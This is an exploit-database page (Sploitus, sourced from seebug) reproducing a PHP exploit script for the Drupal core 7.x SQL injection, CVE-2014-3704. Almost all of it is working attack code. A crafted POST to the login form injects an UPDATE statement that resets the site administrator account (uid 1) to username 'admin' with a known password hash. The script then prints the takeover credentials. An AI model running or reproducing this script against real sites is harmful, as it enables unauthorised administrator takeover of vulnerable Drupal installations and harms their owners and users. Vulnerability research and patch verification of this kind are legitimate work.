Sploitus

Exploit for Drupal Core <= 7.32 - SQL Injection (PHP)

seebug · 2014-11-13

Exploit Code

MARKDOWN30 lines
## https://sploitus.com/exploit?id=SSV:87362
&lt;?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin Dörr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#
 
$url = 'http://www.example.com';
$post_data = &quot;name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'&quot; . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . &quot;'+where+uid+%3D+'1';;#%20%20]=test3&amp;name[0]=test&amp;pass=test&amp;test2=test&amp;form_build_id=&amp;form_id=user_login_block&amp;op=Log+in&quot;;
 
$params = array(
'http' =&gt; array(
'method' =&gt; 'POST',
'header' =&gt; &quot;Content-Type: application/x-www-form-urlencoded\r\n&quot;,
'content' =&gt; $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&amp;destination=node', null, $ctx);
 
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') &amp;&amp; $data) {
echo &quot;Success! Log in with username \&quot;admin\&quot; and password \&quot;admin\&quot; at {$url}user/login&quot;;
} else {
echo &quot;Error! Either the website isn't vulnerable, or your Internet isn't working. &quot;;
}
?&gt;